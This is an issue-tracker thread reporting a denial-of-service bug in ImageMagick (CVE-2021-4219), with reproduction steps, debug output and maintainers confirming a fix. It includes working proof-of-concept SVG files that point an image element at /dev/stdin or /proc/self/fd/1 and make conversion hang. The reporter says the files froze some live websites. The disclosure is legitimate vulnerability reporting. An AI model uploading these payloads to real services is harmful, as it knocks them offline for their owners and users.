Specially crafted SVG hangs ImageMagick forever, possible to leverage DoS

[stypr]

Tested ImageMagick version

6.9.10-23, 7.1.0-18

Fixed Versions

6.9.12-34, 7.1.0-19

Operating system

Linux

Operating system, version and so on

Ubuntu 20.04.3 LTS / Ubuntu 21.04

Description

Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.

There seems to be a lot of websites affected by this bug and causes a complete hang by uploading this PoC file to the server.

I think it should be better to check the file descriptor coming from /proc and /dev before read() is done.

Steps to Reproduce

1. Craft a SVG file

• ImageMagick 7

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <image href="/dev/stdin" />
  <svg width="1024px" height="1024px" />
</svg>

• ImageMagick 6

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<go>
    <image href="/proc/self/fd/1" />
    <svg width="1024px" height="1024px" />
</go>

2. Run some commands for verification

$ convert --version
Version: ImageMagick 6.9.10-23 Q16 x86_64 20190101 https://imagemagick.org
Copyright: © 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP 
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib
$ identify attack.png
attack.png SVG 1024x1024 1024x1024+0+0 16-bit sRGB 232B 0.000u 0:00.009
$ timeout 60 convert attack.png nope.png
$ timeout 60 mogrify attack.png nope1234.png

[snibgo]

I can't reproduce the problem with IM v7.0.8-4. Which delegate are you using? For me, Inkscape refuses to open the SVG. MSVG and RSVG return quickly, with a white image.

Does limiting resources (such as time) cure the problem for you?

[stypr]

@snibgo

I'm using the default delegate.xml shipped on the latest Ubuntu stable release on 20.04.3 x86_64.

delegate.xml

  <delegate decode="png" encode="webp" command="&quot;cwebp&quot; -quiet %Q &quot;%i&quot; -o &quot;%o&quot;"/>
  <delegate decode="svg" command="&quot;rsvg-convert&quot; -o &quot;%o&quot; &quot;%i&quot;"/>
  <delegate decode="svg:decode" stealth="True" command="&quot;inkscape&quot; &quot;%s&quot; --export-png=&quot;%s&quot; --export-dpi=&quot;%s&quot; --export-background=&quot;%s&quot; --export-background-opacity=&quot;%s&quot; &gt; &quot;%s&quot; 2&gt;&amp;1"/>

Convert hangs forever somewhere here.

$ convert -verbose attack.png nope.png
'inkscape' '/tmp/magick-16770ZqCidVWQSUgg' --export-png='/tmp/magick-16770B3ZH8ygrEB7h' --export-dpi='96,96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-167709qAs39fwMk5h' 2>&1

content of the temporary file generated.

$ cat /tmp/magick-*
push graphic-context
image Over 0,0 0,0 "/dev/stdin"
pop graphic-context
push graphic-context
compliance "SVG"
fill "black"
fill-opacity 1
stroke "none"
stroke-width 1
stroke-opacity 1
fill-rule nonzero
viewbox 0 0 1024 1024
affine 1 0 0 1 0 0
pop graphic-context

These commands run forever and never exits by itself, so I think there needs to be some kind of alarm or timeouts when opening the file, if checking fd is difficult in this case

[fmw42]

Try installing Inkscape. IM should use that and it is better.

[stypr]

Try installing Inkscape. IM should use that and it is better.

I already have inkscape installed on my PC.
My point is that there are web services that are dependent on ImageMagick, and I was able to crash some of web services with this PoC.

$ inkscape --version
Inkscape 0.92.5 (2060ec1f9f, 2020-04-08)
$ convert -verbose attack.png nope.png
'inkscape' '/tmp/magick-19156v7R9pBksZPkI' --export-png='/tmp/magick-191561ezCofbOFbLG' --export-dpi='96,96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-19156H_pjchWXNT5E' 2>&1

Note: It still causes an issue regardless of whether inkscape is installed or not.

[stypr]

I built the latest version of ImageMagick (ImageMagick 7.1.0-18) from sources and found that it's still reproducible on the latest versions, although the payload needs to be changed a little bit.

root@ubuntu:/srv# convert --version
Version: ImageMagick 7.1.0-18 Q16-HDRI x86_64 2021-12-04 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jp2 jpeg lcms lqr lzma openexr png tiff x xml zlib
Compiler: gcc (10.2)

modified attack.svg

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <image href="/dev/stdin" />
  <svg width="1024px" height="1024px" />
</svg>

Test without inkscape (Hangs)

root@ubuntu:/srv# inkscape
Command 'inkscape' not found, but can be installed with:
snap install inkscape  # version 1.0.1-0767f8302a-2020-10-17, or
apt  install inkscape  # version 1.0.2-3ubuntu1
See 'snap info inkscape' for additional versions.
root@ubuntu:/srv# convert -verbose attack.svg nope.png
'inkscape' '/tmp/magick-krpwF0bShC5wshMqqNkJ7fAJrm2qMS2Q' --export-filename='/tmp/magick-KeNRuE1fQwuAoGhRROeemRPDO21E4zvE.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-wY_0uzy4rmxGYzNBAEQ4-iPYJSJdV2vQ' 2>&1

Perhaps you don't need inkscape to convert a SVG file either.

root@ubuntu:/srv# inkscape
Command 'inkscape' not found, but can be installed with:
snap install inkscape  # version 1.0.1-0767f8302a-2020-10-17, or
apt  install inkscape  # version 1.0.2-3ubuntu1
See 'snap info inkscape' for additional versions.
root@ubuntu:/srv# cat 410.svg 
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <path d="M30,1h40l29,29v40l-29,29h-40l-29-29v-40z" stroke="#000" fill="none"/> 
  <path d="M31,3h38l28,28v38l-28,28h-38l-28-28v-38z" fill="#a23"/> 
  <text x="50" y="68" font-size="48" fill="#FFF" text-anchor="middle"><![CDATA[410]]></text>
</svg>
root@ubuntu:/srv# convert -verbose 410.svg 410.png
'inkscape' '/tmp/magick-vwlrvqqTW73Wn81Lk0h3YP4FvmnfNEYO' --export-filename='/tmp/magick-BUNAnOt4ElQ_9KVlUAadmD1-QSWzpLvC.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-v4ZtG3Gl7B1uUju2rMpO_1AicDdzYDL8' 2>&1
mvg:/tmp/magick-BH-n-CxjbaDtuPtcuiaqSSkmlPuW7dW4=>/tmp/magick-BH-n-CxjbaDtuPtcuiaqSSkmlPuW7dW4 MVG 100x100 100x100+0+0 16-bit sRGB 506B 0.020u 0:00.015
410.svg SVG 100x100 100x100+0+0 16-bit sRGB 506B 0.000u 0:00.000
410.svg=>410.png SVG 100x100 100x100+0+0 16-bit sRGB 506B 0.000u 0:00.001

Test with inkscape (does not seem to hang this time)

root@ubuntu:/srv# apt install inkscape
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  fig2dev gawk gcc-11-base imagemagick imagemagick-6.q16 libasan6 libatomic1 libblas3 libcc1-0 libcdr-0.1-1 libdouble-conversion3 libgc1
  libgcc-s1 libgdl-3-5 libgdl-3-common libgfortran5 libgomp1 libgsl25 libgslcblas0 libgtkspell3-3-0 libimage-magick-perl
  libimage-magick-q16-perl libitm1 liblapack3 liblsan0 libnetpbm10 libpotrace0 libquadmath0 librevenge-0.0-0 libstdc++6 libtsan0 libubsan1
  libvisio-0.1-1 libwmf-bin libwpd-0.10-10 libwpg-0.3-3 netpbm python3-bs4 python3-html5lib python3-lxml python3-numpy python3-scour
  python3-soupsieve python3-webencodings
...
root@ubuntu:/srv# convert -verbose attack.svg nope.png
'inkscape' '/tmp/magick-BLeTixHdFQU4qQ7Ag2zSMcjGAjVVGCVT' --export-filename='/tmp/magick-mgLmZddfgEtcWfsT7qlRDmWwdF2gYO4m.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-1-fuN_o8-UGMM-q-TfP5jv4EyZOMYJqr' 2>&1
/tmp/magick-mgLmZddfgEtcWfsT7qlRDmWwdF2gYO4m.png PNG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.000
attack.svg SVG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.000
attack.svg=>nope.png SVG 100x100 100x100+0+0 8-bit sRGB 371B 0.000u 0:00.001

Tested on Ubuntu 21.04

root@ubuntu:/srv# lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu Hirsute Hippo (development branch)
Release:	21.04
Codename:	hirsute

ImageMagick configure

==============================================================================
ImageMagick 7.1.0-18 is configured as follows. Please verify that this
configuration matches your expectations.

Host system type: x86_64-pc-linux-gnu
Build system type: x86_64-pc-linux-gnu

                  Option                        Value
------------------------------------------------------------------------------
Shared libraries  --enable-shared=yes		yes
Static libraries  --enable-static=yes		yes
Build utilities   --with-utilities=yes		yes
Module support    --with-modules=no		no
GNU ld            --with-gnu-ld=yes		yes
Quantum depth     --with-quantum-depth=16	16
High Dynamic Range Imagery
                  --enable-hdri=yes		yes

Install documentation:				yes

Memory allocation library:
  JEMalloc          --with-jemalloc=no		no
  TCMalloc          --with-tcmalloc=no		no
  UMem              --with-umem=no		no

Delegate library configuration:
  BZLIB             --with-bzlib=yes		yes
  Autotrace         --with-autotrace=no		no
  DJVU              --with-djvu=yes		yes
  DPS               --with-dps=yes		no
  FFTW              --with-fftw=no		no
  FLIF              --with-flif=yes		no
  FlashPIX          --with-fpx=yes		no
  FontConfig        --with-fontconfig=yes	yes
  FreeType          --with-freetype=yes		yes
  Ghostscript lib   --with-gslib=no		no
  Graphviz          --with-gvc=yes		no
  HEIC              --with-heic=yes		no
  JBIG              --with-jbig=yes		yes
  JPEG v1           --with-jpeg=yes		yes
  JPEG XL           --with-jxl=no		no
  LCMS              --with-lcms=yes		yes
  LQR               --with-lqr=yes		yes
  LTDL              --with-ltdl=no		no
  LZMA              --with-lzma=yes		yes
  Magick++          --with-magick-plus-plus=yes	yes
  OpenEXR           --with-openexr=yes		yes
  OpenJP2           --with-openjp2=yes		yes
  PANGO             --with-pango=yes		no
  PERL              --with-perl=no		no
  PNG               --with-png=yes		yes
  RAQM              --with-raqm=yes		no
  RAW               --with-raw=yes		no
  RSVG              --with-rsvg=no		no
  TIFF              --with-tiff=yes		yes
  WEBP              --with-webp=yes		no
  WMF               --with-wmf=no		no
  X11               --with-x=			yes
  XML               --with-xml=yes		yes
  ZIP               --with-zip=yes		no
  ZLIB              --with-zlib=yes		yes
  ZSTD              --with-zstd=yes		no

Delegate program configuration:
  GhostPCL          None			pcl6 (unknown)
  GhostXPS          None			gxps (unknown)
  Ghostscript       None			gs (9.53.3)

Font configuration:
  Apple fonts       --with-apple-font-dir=default	
  Dejavu fonts      --with-dejavu-font-dir=default	none
  Ghostscript fonts --with-gs-font-dir=default		/usr/share/fonts/type1/gsfonts/
  URW-base35 fonts  --with-urw-base35-font-dir=default	none
  Windows fonts     --with-windows-font-dir=default	none

X11 configuration:
  X_CFLAGS        = 
  X_PRE_LIBS      =  -lSM -lICE
  X_LIBS          = 
  X_EXTRA_LIBS    = 

Options used to compile and link:
  PREFIX          = /usr/local
  EXEC-PREFIX     = /usr/local
  VERSION         = 7.1.0-18
  CC              = gcc
  CFLAGS          = -I/usr/include/libxml2 -I/usr/include/libpng16 -pthread -I/usr/include/OpenEXR  -I/usr/include/lqr-1 -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -I/usr/include/openjpeg-2.3  -I/usr/include/freetype2 -I/usr/include/libpng16 -I/usr/include/uuid -I/usr/include/freetype2 -I/usr/include/libpng16 -pthread  -fopenmp -Wall -g -O2 -mtune=amdfam10 -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16
  CPPFLAGS        =  -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 
  PCFLAGS         = 
  DEFS            = -DHAVE_CONFIG_H
  LDFLAGS         =  
  LIBS            =  -ljbig -llcms2 -ltiff -lfreetype  -ljpeg   -llqr-1 -lglib-2.0 -lpng16 -lz  -ldjvulibre    -lfontconfig -lfreetype      -lXext -lXt   -lSM -lICE -lX11  -llzma -lbz2 -lIlmImf-2_5 -lImath-2_5 -lHalf-2_5 -lIex-2_5 -lIexMath-2_5 -lIlmThread-2_5 -pthread -lopenjp2    -lxml2  -lz     -lm    -lpthread 
  CXX             = g++
  CXXFLAGS        =  -pthread
  FEATURES        = DPC HDRI Cipher OpenMP
  DELEGATES       = bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr openjp2 png ps tiff x xml zlib
==============================================================================

[stypr]

As mentioned earlier, the default package without inkscape being explicitly installed still lets the imagemagick hang forever, and I found some websites hanging forever after uploading the crafted SVG file.
I hope there should be some ways to put timeout or reject file descriptors

[snibgo]

As I asked above: Does limiting resources (such as time) cure the problem for you?

[urban-warrior]

Thanks for the problem report. We can reproduce it and will have a patch to fix it in the GIT main branch @ https://github.com/ImageMagick/ImageMagick later today. The patch will be available in the beta releases of ImageMagick @ https://imagemagick.org/download/beta/ by sometime tomorrow.

[stypr]

@snibgo

As I asked above: Does limiting resources (such as time) cure the problem for you?

Yes.

It should help but to a some certain extent. There are some rare cases where open() may slow down depending on the type of fs and conditions of disks you're using.

The best way would be to detect S_IFCHR from stat()'s st_mode.

[stypr]

Tested ImageMagick 7.1.0-20 on Ubuntu 21.04.
Seems like it works fine now.

$ convert -version
Version: ImageMagick 7.1.0-20 Q16-HDRI x86_64 2021-12-22 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jp2 jpeg lcms lqr lzma openexr png tiff x xml zlib
Compiler: gcc (10.3)

$ convert -verbose attack.svg attack.png
'inkscape' '/tmp/magick-twCAk57ZWHyxKT5NSfJ4omkgtAHSiYvR' --export-filename='/tmp/magick-nuV9Vh_kdAhYKjqDQIHlWtzxL6szOlVH.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='0.99999999999900002212' > '/tmp/magick-irpVl0ub-PruzN6c-AS1jrblDa4mryCq' 2>&1
mvg:/tmp/magick-Clqs67jnm-4NnaGBz4D4eRcgBemmcqCH=>/tmp/magick-Clqs67jnm-4NnaGBz4D4eRcgBemmcqCH MVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.004
attack.svg SVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.000
attack.svg=>attack.png SVG 100x100 100x100+0+0 16-bit sRGB 470B 0.000u 0:00.001
convert: no decode delegate for this image format `' @ error/constitute.c/ReadImage/572.
convert: non-conforming drawing primitive definition `image' @ error/draw.c/RenderMVGContent/4465.

[stypr]

CVE-2021-4219 was assigned to this issue.